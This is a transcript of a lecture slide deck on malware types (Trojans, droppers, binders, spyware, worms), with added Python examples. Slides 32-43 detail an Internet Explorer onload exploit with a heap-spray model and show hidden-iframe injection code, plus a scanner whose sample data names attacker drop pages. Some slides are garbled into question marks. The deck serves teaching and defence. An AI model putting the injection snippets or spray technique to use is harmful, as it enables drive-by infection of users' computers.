The Attack and Defense of Computers - PowerPoint PPT Presentation

About This Presentation
Title:

The Attack and Defense of Computers

Slides: 85
Provided by: yanl

Transcript and Presenter's Notes

1
  • The Attack and Defense of Computers
  • Dr. ? ? ?

2
  • Malware

3
Malicious Software (Malware)
  • Security tools and toolkits
  • Back doors (trap doors)
  • Logic bombs
  • Viruses
  • Worms
  • Binders
  • Droppers
  • Trojan Horses
  • Bacteria or rabbit programs.
  • Spyware
  • Rootkit
  • URL Injection
  • Dialers

4
Security Tools and Toolkits
  • Automatically scan a system for computer security
    weaknesses.
  • Can be used by both security professionals and
    attackers.
  • e.g. Nessus, COPS, ISS, Tiger, and so on.
  • There are also programs and tool sets whose only
    function is to attack computers; these are often
    run by "script kiddies" who do not understand how
    the tools work.
  • P.S. Tools obtained from untrusted sources may
    damage the systems they are installed on, or may
    contain a booby trap that compromises those
    systems.

5
Logic Bombs
  • A logic bomb is a piece of code intentionally
    inserted into a software system that sets off a
    malicious function when specified conditions are
    met.
  • For example, a programmer may hide a piece of
    code that starts deleting files should he ever
    leave the company (e.g. when his record disappears
    from the salary database).
  • Usually written by insiders, i.e. the system's own
    programmers.

6
Logic Bombs and Viruses and Worms
  • Software that is inherently malicious, such as
    viruses and worms, often contains logic bombs that
    execute a certain payload
  • at a pre-defined time
  • or
  • when some other condition is met.
  • Many viruses attack their host systems on
    specific dates, such as Friday the 13th or April
    Fool's Day.
  • Trojans that activate on certain dates are often
    called "time bombs".

7
Key Logger
  • A program or hardware device that captures every
    key depression on the computer.
  • Also known as "Keystroke Cops," they are used to
    monitor a user's activities by recording every
    keystroke the user makes, including typos,
    backspacing, and retyping.

8
Security Concerns about Key Loggers
  • Keystroke logging can be achieved by both
    hardware and software means.
  • There is no easy way to prevent keylogging
    software being installed on your PC, as it is
    usually done by a method of stealth.
  • If you are using a home PC, it is likely to be
    free of keystroke-logging hardware (but remember
    there may still be keystroke-logging software).

9
Precautions against Key Loggers
  • Try and avoid typing private details on public
    PCs,
  • Always try and avoid visiting sites on public PCs
    that require you to enter your login details,
    e.g. an online banking account.

10
Example
  • Ardamax Keylogger 12

11
Dialers
  • A program that either
  • replaces the phone number in a modem dial-up
    connection with a long-distance number, often out
    of the country, in order to run up phone charges
    on pay-per-call numbers, or
  • dials out at night to send keylogger or other
    collected information to an attacker.

12
URL Injection
  • Changes the URL the browser submits to servers
    belonging to some or all domains, so that the
    request is redirected to a site of the attacker's
    choosing.

13
Bacteria and Rabbits
  • Bacteria (also known as rabbit programs) are a
    type of malware that create many instances of
    themselves, or run many times simultaneously, in
    order to consume large amounts of system
    resources.
  • Bacteria create a denial of service effect as
    legitimate programs may no longer be able to run,
    or at least may not run properly.

14
  • Binder CA

15
Definition of Binder 
  • A tool that combines two or more files into a
    single file, usually for the purpose of hiding
    one of them.
  • A binder compiles the list of files that you
    select into one host file, which you can rename.
  • A host file is a simple custom compiled program
    that will decompress and launch the embedded
    programs.
  • When you start the host, the embedded files in it
    are automatically decompressed and launched.

16
Example
  • When a Trojan is bound with Notepad, for
    instance, the result will appear to be Notepad,
    and appear to run like Notepad, but the Trojan
    will also be run.

17
Program
  • YAB Yet Another Binder
  • User Guide

18
  • Dropper Wikipedia

19
Definition of a Dropper
  • A dropper is a program (malware component) that
    has been designed to "install" some sort of
    malware (virus, backdoor, etc.) on a target
    system.
  • Single-stage: the malware code is contained
    within the dropper, in such a way as to avoid
    detection by virus scanners.
  • Two-stage: the dropper downloads the malware to
    the target machine once activated.

20
Types of Droppers
  • There are two major types of droppers
  • those that do not require user interaction
  • perform through the exploitation of a system by
    some vulnerability
  • those that require user interaction by convincing
    the user that it is some legitimate or benign
    program.

21
Examples
  • 8sec!Trojan

22
  • Trojan Horse Wikipedia

23
Trojan Horse
  • In the context of computer software, a Trojan
    horse is a malicious program that is disguised as
    or embedded within legitimate software.
  • Trojans use false and fake names to trick users
    into executing them.
  • These strategies are often collectively termed
    social engineering.
  • A Trojan is designed to operate with functions
    unknown to the victim.
  • The useful, or seemingly useful, functions serve
    as camouflage for these undesired functions.

24
Properties of Trojan Horses
  • Trojan horse programs cannot operate
    autonomously, in contrast to some other types of
    malware, like worms.
  • Just as the Greeks needed the Trojans to bring
    the horse inside for their plan to work,
  • Trojan horse programs depend on actions by the
    intended victims
  • if Trojans replicate and even distribute
    themselves, each new victim must run the
    program/Trojan.
  • For the above reasons, a Trojan horse's virulence
    depends on
  • successful implementation of social engineering
    concepts
  • but doesn't depend on
  • flaws in a computer system's security design or
    configuration.

25
Categories of Trojan Horses
  • There are two common types of Trojan horses
  • an otherwise useful software that has been
    corrupted by a cracker inserting malicious code
    that executes while the program is used.
  • Examples include various implementations of
  • weather alerting programs
  • computer clock setting software
  • peer to peer file sharing utilities.
  • a standalone program that masquerades as
    something else, like a game or image file (e.g.
    firework.jpg.exe in Windows).

26
Malware Parasitizes inside Trojan Horses
  • In practice, Trojan Horses in the wild often
    contain
  • spying functions (such as a packet sniffer)
  • backdoor functions that allow a computer,
    unbeknownst to the owner, to be remotely
    controlled from the network, creating a zombie
    computer.
  • The Sony/BMG rootkit Trojan, distributed on
    millions of music CDs through 2005, did both of
    these things.
  • Because Trojan horses often have these harmful
    behaviors, there often arises the
    misunderstanding that such functions define a
    Trojan Horse.

27
Example of a Simple Trojan Horse
  • A simple example of a Trojan horse would be a
    program named waterfalls.scr.exe claiming to be a
    free waterfall screensaver which, when run,
    instead begins erasing all the files on the
    computer.

28
E-Mail Trojan Horses
  • On the Microsoft Windows platform, an attacker
    might attach a Trojan horse with an
    innocent-looking filename to an email message
    which entices the recipient into opening the
    file.
  • The Trojan horse itself would typically be a
    Windows executable program file, and thus must
    have an executable filename extension such as
    .exe, .com, .scr, .bat, or .pif.
  • Since Windows by default hides the extensions of
    known file types, the Trojan horse's real
    extension can be "masked" by giving it a name
    such as Readme.txt.exe. With file extensions
    hidden, the user sees only Readme.txt and could
    mistake it for a harmless text file.
  • Icons can also be chosen to imitate the icon
    associated with a different and benign program,
    or file type.
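As an added example (not part of the original slides), the following Python code applies the rule of this slide, and of the later "beware of hidden file extensions" precaution, to attachment names: a file is flagged when its real, final extension is one Windows will execute while the part the user sees after extension hiding looks like a harmless document or image. The executable-extension list is the one given on the slide; the list of "benign-looking" extensions and the sample attachment names are assumptions made for the demo.

```python
import os

# Extensions Windows executes on double-click (the list given on this slide).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".bat", ".pif"}
# Extensions a user is likely to treat as harmless (assumption for this example).
BENIGN_EXTS = {".txt", ".jpg", ".jpeg", ".gif", ".png", ".pdf", ".doc", ".mp3"}


def extensions(name):
    """All extensions of a file name, in order: 'Readme.txt.exe' -> ['.txt', '.exe']."""
    base = os.path.basename(name.replace("\\", "/"))
    parts = base.split(".")
    return ["." + p.lower() for p in parts[1:]]


def explorer_display_name(name):
    """What Explorer shows with 'Hide extensions for known file types' on:
    only the last extension is dropped, so 'Readme.txt.exe' shows as 'Readme.txt'."""
    base = os.path.basename(name.replace("\\", "/"))
    root, _ext = os.path.splitext(base)
    return root


def classify(name):
    """'masked-executable' for the Readme.txt.exe / susie.jpg.exe pattern,
    'executable' for any other file Windows would run, 'other' otherwise."""
    exts = extensions(name)
    if not exts or exts[-1] not in EXECUTABLE_EXTS:
        return "other"
    if len(exts) >= 2 and exts[-2] in BENIGN_EXTS:
        return "masked-executable"
    return "executable"


def triage(names):
    """For each attachment: (real name, what the victim sees, verdict)."""
    return [(n, explorer_display_name(n), classify(n)) for n in names]


if __name__ == "__main__":
    # Constructed sample attachment names, including the ones used on the slides.
    sample = ["Readme.txt.exe", "susie.jpg.exe", "waterfalls.scr.exe",
              "setup.exe", "report.pdf", "README"]
    for real, shown, verdict in triage(sample):
        print("%-20s shown as %-14s -> %s" % (real, shown, verdict))
```

Note that waterfalls.scr.exe is reported only as "executable": a .scr file is itself a program, so the name is not hiding an executable behind a document type, it is hiding one executable type behind another. A mail gateway should treat both verdicts as reasons to quarantine.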

29
Trojan Downloader (F-Secure, Microsoft)
  • Trojan downloader is usually a standalone program
    that attempts to secretly download and run other
    files from remote web and ftp sites.
  • Usually Trojan downloaders
  • download different Trojans and backdoors
  • activate them on an affected system without
    user's approval.
  • Trojan downloader, when run, usually installs
    itself to system and waits until Internet
    connection becomes available. After that it
    attempts to connect to a web or ftp site,
    download specific file or files and run them.

30
Commonly Used Methods of Infection
  • Websites.
  • E-mails.
  • Downloaded Files.

31
Websites
  • You can be infected by visiting a rogue website.
  • Internet Explorer is most often targeted by
    makers of Trojans and other pests, because it
    contains numerous bugs.
  • Some of the bugs improperly handle data (such as
    HTML or images) by executing it as a legitimate
    program.
  • Attackers who find such vulnerabilities can then
    specially craft a bit of malformed data so that
    it contains a valid program to do their bidding.
  • The more "features" a web browser has, the higher
    your risk of having security holes that can be
    exploited by a Trojan horse.
  • for example
  • ActiveX objects,
  • some older versions of Flash
  • Java

32
Example 1: Microsoft IE window() Arbitrary Code
Execution Vulnerability (Secunia)
  • The vulnerability is caused by certain objects
    not being initialized correctly when the
    window() function is used in conjunction with the
    <body onload> event.
  • This can be exploited to execute arbitrary code
    on a vulnerable browser via specially crafted
    JavaScript code called directly when a site has
    been loaded.
  • Example: <body onload="window()">
  • Successful exploitation requires that the user is
    e.g. tricked into visiting a malicious website.
  • PROOF OF CONCEPT

33
  • Explanation Computer Terrorism

34
<body onLoad> (HTML Code Tutorial)
  • The browser triggers onLoad when the document is
    finished loading. The contents of onLoad is one
    or more JavaScript commands. So, for example, the
    following <body ...> tag tells the browser to
    bring up an alert box once the page is completely
    loaded:
  • <BODY onLoad="alert('hello world!')">

35
MS IE - Crash on JavaScript window()- calling (1)
  • There is a bug in Microsoft Internet Explorer
    that causes it to crash.
  • The bug occurs because Internet Explorer cannot
    handle a call to a JavaScript function that has
    the same name as the "window" object (an object
    built into JavaScript).

36
MS IE - Crash on JavaScript window()- calling (2)
(Symantec)
  • Internet Explorer fails to properly initialize
    the JavaScript window() function. When the
    'onLoad' handler is set to call the improperly
    initialized window() function, the browser
    attempts to call the address 0x006F005B, which is
    the UTF-16 text "[o" (0x5B, 0x6F), the start of
    the string "[object", read as a pointer.
  • The faulting instruction is CALL DWORD PTR [ECX+8].
  • It has been shown that JavaScript prompt boxes can
    be used by attackers to fill the memory region
    around 0x00600000 with attacker-supplied data (a
    heap spray), allowing executable machine code to
    be placed at the address that gets called.
  • Crash, if the address points to non-code.
  • Execution, if the address points to code.
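The two slides above describe the mechanism in prose; the following Python model, added here and not part of the original slides or of the published exploit, lets you check the two numbers on this slide and reason about the heap spray. It does not touch a browser: the spray parameters (block size, sled length, number of blocks) are assumptions chosen for the demo, and contiguous allocation is assumed, which real heaps with chunk headers and gaps do not give you, so the model is the best case.

```python
def utf16_dword(s):
    """Read the first two UTF-16LE code units of s as a little-endian dword.
    JavaScript strings are stored as UTF-16, and "[object" is how an object
    renders as a string, so '[' (0x5B) and 'o' (0x6F) become 0x006F005B when
    the string's text is mistakenly used as a pointer."""
    return int.from_bytes(s.encode("utf-16-le")[:4], "little")


def spray_bytes_needed(target, base):
    """Bytes the spray must cover, starting at base, for target to be inside it."""
    return target - base + 1


def landing(target, base, block_size, sled_len, nblocks):
    """Outcome when execution is diverted to target after nblocks contiguous
    blocks of block_size bytes have been sprayed from base, each a NOP sled of
    sled_len bytes followed by shellcode (assumed layout, see lead-in)."""
    if target < base or target >= base + nblocks * block_size:
        return "unmapped"      # nothing at that address: the browser crashes
    offset = (target - base) % block_size
    if offset < sled_len:
        return "sled"          # slides down the NOPs into the shellcode
    return "shellcode"         # lands mid-shellcode: execution is unreliable


def sled_hit_probability(block_size, sled_len):
    """Chance that an arbitrary address inside a sprayed block is in the sled."""
    return sled_len / block_size


if __name__ == "__main__":
    target = utf16_dword("[object")
    print(hex(target))                                  # the address on the slide
    print(spray_bytes_needed(target, 0x00600000))       # just under 1 MB to spray
    # Assumed spray: 1 MB blocks from 0x00600000, all but the last 256 bytes NOPs.
    print(landing(target, 0x00600000, 0x100000, 0x100000 - 256, 8))
    print(sled_hit_probability(0x100000, 0x100000 - 256))
```

The arithmetic shows why the prompt boxes matter: the fixed call target lies almost a megabyte above the start of the region the attacker can fill, so enough data has to be allocated to reach it, and the sled has to be long relative to the block so that wherever inside a block the address falls, it lands on NOPs rather than in the middle of the shellcode.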

37
Dangerous Web Site
  • The web site pointed to by the following URL is
    one containing the trap described in the previous
    slides.
  • HTTP MSIE JavaScript OnLoad Rte CodeExec
    (Symantec)
  • http://marc.theaimsgroup.com/?l=bugtraq&m=111746394106172&w=2

38
Example 2 Trojan Horse Exploits Image Flaw
Declan McCullagh et al.
  • EasyNews, a provider of Usenet newsgroups, said
    it has identified two JPEG images that take
    advantage of a previously identified flaw ( a
    heap-based buffer overflow Michael Cobb ) in
    the way Microsoft software handles graphics
    files.
  • Windows users could have their computers infected
    merely by opening one of those Trojan horse
    images.
  • Attackers tried to use these JPEGs to download
    Trojan (horse programs) to vulnerable computers.

39
Example 3: Compromise a Web Server and Add Hidden
Download Instructions to Web Pages
  • Create a frame with size 0 that loads the
    attacker's page.

40
  • ??????OpenBlue

41
  • ?????
  • ??
  • SQL Injection ?
  • ?????,?????? ????????? ?? ??????? .

42
????
  • ???????
  • <iframe src=???? width=0 height=0></iframe>

43
JScript ????
  • ?????????? xxx.js ??????????????????
  • document.write("<iframe width='0' height='0'
    src='????'></iframe>")
  • ??JScript ??????
  • ???????
  • <script language=javascript src=xxx.js></script>
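To check a web server for the injection shown on the last three slides, here is a Python scanner added as an example (it is not part of the original slides). It parses a fetched page for zero-size or hidden iframes, collects the external scripts the page loads, and searches those scripts for document.write() calls that write a hidden iframe. The sample page, the xxx.js script body and the attacker URL are constructed for the demo; in a real run the fetch callback would retrieve each script over HTTP, and obfuscated scripts (escape/unescape, string concatenation) would need to be decoded before being passed to scan_js.

```python
import re
from html.parser import HTMLParser

ZERO_SIZES = {"0", "0px", "0%"}
# document.write("...") or document.writeln('...') with a plain string literal.
_DOC_WRITE = re.compile(r"""document\.write(?:ln)?\s*\(\s*(['"])(.*?)\1\s*\)""", re.S)


class _Finder(HTMLParser):
    """Collects zero-size/hidden iframes and the external scripts a page loads."""

    def __init__(self):
        super().__init__()
        self.hidden_iframes = []
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "iframe":
            style = a.get("style", "").lower().replace(" ", "")
            zero = any(a.get(dim, "").lower() in ZERO_SIZES for dim in ("width", "height"))
            if zero or "display:none" in style or "visibility:hidden" in style:
                self.hidden_iframes.append(a.get("src", ""))


def scan_html(html):
    """Return (hidden iframe srcs, external script srcs) found in the markup."""
    finder = _Finder()
    finder.feed(html)
    finder.close()
    return finder.hidden_iframes, finder.script_srcs


def scan_js(js):
    """Find hidden iframes written by document.write() string literals in a script."""
    found = []
    for _quote, markup in _DOC_WRITE.findall(js):
        found.extend(scan_html(markup)[0])
    return found


def scan_page(html, fetch):
    """Scan a page and the scripts it includes; fetch(src) returns script text or None."""
    hidden, scripts = scan_html(html)
    findings = [("html", src) for src in hidden]
    for src in scripts:
        body = fetch(src)
        if body is not None:
            findings.extend((src, s) for s in scan_js(body))
    return findings


# Constructed sample: one legitimate ad frame, one injected zero-size frame,
# and an injected external script that writes another hidden frame.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://attacker.invalid/drop.html" width=0 height=0></iframe>
<script language=javascript src=xxx.js></script>
</body></html>"""
SAMPLE_SCRIPTS = {
    "xxx.js": "document.write(\"<iframe width='0' height='0' "
              "src='http://attacker.invalid/drop2.html'></iframe>\")",
}

if __name__ == "__main__":
    for where, src in scan_page(SAMPLE_HTML, SAMPLE_SCRIPTS.get):
        print("hidden iframe in %s -> %s" % (where, src))
```

Run it against a copy of each page fetched from the server itself rather than from a browser cache, and compare the findings with what the site is supposed to include: a zero-size frame pointing at a host the site does not own is the signature of the compromise described above.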

44
Emails and Trojan Horses
  • The majority of Trojan horse infections occur
    because the user was tricked into running an
    infected program.
  • This is why you're not supposed to open
    unexpected attachments on emails -- the program
    is often a cute animation or a sexy picture, but
    behind the scenes it infects the computer with a
    Trojan or virus.

45
Microsoft Outlook
  • If you use Microsoft Outlook, you're vulnerable
    to many of the same problems that Internet
    Explorer has, even if you don't use IE directly.
  • The same vulnerabilities exist since Outlook
    allows email to contain HTML and images (and
    actually uses much of the same code to process
    these as Internet Explorer).

46
Downloaded Files
  • The infected program doesn't have to arrive via
    email, though it can be
  • sent to you in an Instant Message
  • downloaded from a Web site or by FTP
  • delivered on a CD or floppy disk

47
Precautions against Trojan Horses (1)
  • Trojan Horses are commonly spread through an
    e-mail, much like other types of common viruses.
  • The best ways to protect yourself and your
    company from Trojan Horses are as follows
  • If you receive e-mail from someone that you do
    not know or you receive an unknown attachment
    never open it right away.
  • As an e-mail user you should confirm the source.
  • Some hackers have the ability to steal an address
    books so if you see e-mail from someone you know
    that does not necessarily make it safe.

48
Precautions against Trojan Horses (2)
  • When setting up your e-mail client make sure that
    you have the settings so that attachments do not
    open automatically.
  • Some e-mail clients come ready with an anti-virus
    program that scans any attachments before they
    are opened.
  • If your client does not come with this, it would
    be best to purchase one or download one for free.
  • Make sure your computer has an anti-virus program
    on it and make sure you update it regularly.
  • If you have an auto-update option included in
    your anti-virus program you should turn it on,
    that way if you forget to update your software
    you can still be protected from threats

49
Precautions against Trojan Horses (3)
  • Operating systems offer patches to protect their
    users from certain threats and viruses, including
    Trojan Horses.
  • Software developers like Microsoft offer patches
    that in a sense close the hole that the Trojan
    horse or other virus would use to get through to
    your system. If you keep your system updated with
    these patches your computer is kept much safer.
  • Avoid using peer-2-peer or P2P sharing networks
    like Kazaa, Limewire, Ares, or Gnutella because
  • those programs are generally unprotected from
    Trojan Horses
  • Trojan Horses are especially easy to spread
    through these programs
  • Some of these programs do offer some virus
    protection but often they are not strong enough.

50
Precautions against Trojan Horses (4)
  • NEVER download blindly from people or sites which
    you aren't 100% sure about.
  • However, legitimate web sites may be compromised
    by attackers who modify web pages to contain
    scripts that download malware.
  • Even if the file comes from a friend, you still
    must be sure what the file is before opening it.
    (Ask your friend whether she/he sent the file to
    you.)
  • Beware of hidden file extensions (under Windows,
    susie.jpg.exe is shown only as susie.jpg).
  • Never use features in your programs that
    automatically get or preview files (Outlook
    preview mode).
  • Never blindly type commands that others tell you
    to type, or go to a web site mentioned by
    strangers.

51
Well-known Trojan Horses
  • Back Orifice
  • Back Orifice 2000
  • Beast Trojan
  • NetBus
  • SubSeven
  • Downloader-EV
  • Pest Trap
  • flooder
  • Tagasaurus
  • Vundo trojan
  • Gromozon Trojan

52
Experiment
  • Survey some Trojan horses to see what approaches
    are adopted by them to fool a user to execute
    them.

53
List of Trojan Horses
  • http//en.wikipedia.org/wiki/List_of_trojan_horses

54
  • Spyware Wikipedia

55
A Large Number of Toolbars, Some Added by
Spyware, Overwhelm an IE Session
56
Some Statistics about Spyware A. Moshchuk et al.
  • A scan (2005) performed by AOL/NCSA of 329
    customers' computers found that 80% were infected
    with spyware programs.
  • Each infected computer contained an average of 93
    spyware components.

57
Definition of Spyware
  • Spyware is computer software that is installed
    surreptitiously on a personal computer to
  • monitor
  • intercept
  • or
  • take partial control over
  • the user's interaction with the computer,
    without the user's informed consent.

58
Activities of Spyware
  • Spyware programs can
  • secretly monitor the user's behavior and then
    send this information to a hacker over the
    Internet
  • collect various types of personal information
  • interfere with user control of the computer in
    other ways, such as
  • installing additional software
  • redirecting Web browser activity
  • diverting advertising revenue to a third party.

59
Spyware Functions (A. Moshchuk et al.)
60
Types of Information Collected by Spyware
  • Spyware can collect many different types of
    information about a user.
  • More benign programs can attempt to track what
    types of websites a user visits and send this
    information to an advertisement agency.
  • More malicious versions can try to record what a
    user types to try to intercept passwords or
    credit card numbers.
  • Yet other versions simply launch pop-ups with
    advertisements.

61
OSes vs. Spyware
  • As of 2006, spyware has become one of the
    pre-eminent security threats to computer-systems
    running Microsoft Windows OSes.
  • Some malware on the Linux and Mac OS X platforms
    has behavior similar to Windows spyware, but to
    date has not become anywhere near as widespread.

62
Spyware Certification
  • The Spyware-Free Certification program evaluates
    software to ensure that the program does not
    install or execute any forms of malicious code.

63
Typical Tactics Adopted by Spyware
  • Delivery of unsolicited pop-up advertisements.
  • Monitoring of Web-browsing activity for marketing
    purposes.
  • Theft of personal information

64
Adware
  • The term adware frequently refers to any software
    which displays advertisements, whether or not it
    does so with the user's consent.
  • Programs such as the Eudora mail client display
    advertisements as an alternative to shareware
    registration fees.
  • These classify as "adware" in the sense of
    advertising-supported software, but not as
    spyware.
  • Adware in this form does not operate
    surreptitiously or mislead the user, and provides
    the user with a specific service.

65
Spyware and Pop-up Ads
  • Spyware displays advertisements related to what
    it finds from spying on you, not the ones posted
    by advertisers.
  • Claria Corporation's Gator Software and Exact
    Advertising's BargainBuddy provide examples of
    this sort of program.
  • Visited Web sites frequently install Gator on
    client machines in a surreptitious manner, and it
    directs revenue to the installing site and to
    Claria by displaying advertisements to the user.
    The user experiences a large number of pop-up
    advertisements.

66
Pop-up Ads
  • Pop-up ads or popups are a form of online
    advertising on the World Wide Web.
  • It works when certain web pages open a new web
    browser window to display advertisements.
  • The pop-up window containing an advertisement is
    usually generated by JavaScript, but can be
    generated by other means as well.

67
Pop-under Ads
  • A variation on the pop-up window is the pop-under
    advertisement. This opens a new browser window,
    behind the active window.
  • Pop-unders interrupt the user less, but are not
    seen until the desired windows are closed, making
    it more difficult for the user to determine which
    Web page opened them.

68
Dozens of Pop-up Ads Cover a Desktop.
69
Web Activity Monitor
  • Other spyware behavior, such as reporting on
    websites the user visits, frequently accompany
    the displaying of advertisements.
  • Monitoring web activity aims at building up a
    marketing profile on users in order to sell
    "targeted" advertisement impressions.

70
Other Victims of Spyware
  • The prevalence of spyware has cast suspicion upon
    other programs that track Web browsing, even for
    statistical or research purposes.
  • Some observers describe the Alexa Toolbar, an
    Internet Explorer plug-in published by
    Amazon.com, as spyware (and some anti-spyware
    programs report it as such) although many users
    choose to install it.

71
Identity Theft and Fraud
  • Some spyware is closely associated with identity
    theft.
  • Spyware may transmit the following information to
    attackers
  • chat sessions,
  • user names,
  • passwords,
  • bank information, etc.
  • Spyware has principally become associated with
    identity theft in that keyloggers are routinely
    packaged with spyware.
  • John Bambenek, who researches information
    security, estimates that identity thieves have
    stolen over 24 billion US dollars of account
    information in the United States alone

72
  • Routes of Infection

73
Routes of Infection
  • Spyware does not directly spread in the manner of
    a computer virus or worm
  • generally, an infected system does not attempt to
    transmit the infection to other computers.
  • Instead, spyware gets on a system
  • through deception of the user
  • or
  • through exploitation of software vulnerabilities.

74
Masquerade
  • One way of distributing spyware involves tricking
    users by manipulating security features designed
    to prevent unwanted installations.

75
Masquerade - Example
  • The Internet Explorer Web browser, by design,
    prevents websites from initiating an unwanted
    download.
  • Instead, a user action (such as clicking on a
    link) must normally trigger a download.
  • However, links can prove deceptive
  • For instance,
  • A pop-up ad may appear like a standard Windows
    dialog box.
  • The box contains a message such as "Would you
    like to optimize your Internet access?" with
    links which look like buttons reading Yes and No.
  • No matter which "button" the user presses, a
    download starts, placing the spyware on the
    user's system.

76
A Masquerade Example
  • Malicious websites may attempt to install spyware
    on readers' computers.
  • In this screenshot a website has triggered a
    pop-up that offers spyware in the guise of a
    security upgrade.

77
Bundled with Shareware
  • Spyware can also come bundled with
  • shareware
  • other downloadable software
  • music CDs.
  • The user downloads a program (for instance, a
    music program or a file-trading utility) and
    installs it, and the installer additionally
    installs the spyware. Although the desirable
    software itself may do no harm, the bundled
    spyware does.
  • In some cases, spyware authors have paid
    shareware authors to bundle spyware with their
    software.
  • In other cases, spyware authors have repackaged
    desirable free software with installers that add
    spyware.

78
Bundled Shareware Example
  • The BearShare file-trading program, "supported"
    by WhenU spyware.
  • In order to install BearShare, users must agree
    to install "the SAVE! bundle" from WhenU.
  • The installer provides only a tiny window in
    which to read the lengthy license agreement.
    Although the installer claims otherwise, the
    software transmits users' browsing activity to
    WhenU servers.

79
Through Trojan Horse
  • Classically, a Trojan horse, by definition,
    smuggles in something dangerous in the guise of
    something desirable. Some spyware programs get
    spread in just this manner.
  • The distributor of spyware presents the program
    as a useful utility for instance as a Web
    accelerator or as a helpful software agent.
  • Users download and install the software without
    immediately suspecting that it could cause harm.

80
Vulnerabilities in Web Browsers
  • Some spyware authors infect a system by attacking
    security holes
  • in the Web browser
  • or
  • in other software.
  • When the user navigates to a Web page controlled
    by the spyware author, the page contains code
    which attacks the browser and forces the download
    and install of spyware.
  • Common browser exploits target security
    vulnerabilities in Internet Explorer and in the
    Microsoft Java runtime.

81
Notable Programs Distributed with Spyware
  • Messenger Plus! (only if you agree to install
    their "sponsor" program)
  • Bearshare
  • Bonzi Buddy
  • DAEMON Tools (only if you agree to install their
    "sponsor" program)
  • DivX (except for the paid version, and the
    "standard" version without the encoder). DivX
    announced removal of GAIN software from version
    5.2.
  • Dope Wars
  • ErrorGuard
  • FlashGet (free version)
  • Grokster
  • Kazaa
  • Morpheus
  • RadLight
  • WeatherBug
  • EDonkey2000

82
  • Worm

83
Worms
  • Worms spread themselves by proactively attacking
    programs that have a specific vulnerability.
  • The most frequently used attack approaches
    include buffer overflow attacks, format string
    attacks, integer overflow attacks, and so on.
  • Morris Worm, 1988
  • Code Red, Slammer.

84
Comparisons between Viruses, Trojan Horses, and
Worms
  • The way they behave
  • How are they triggered?
  • How do they spread?
  • Need host programs?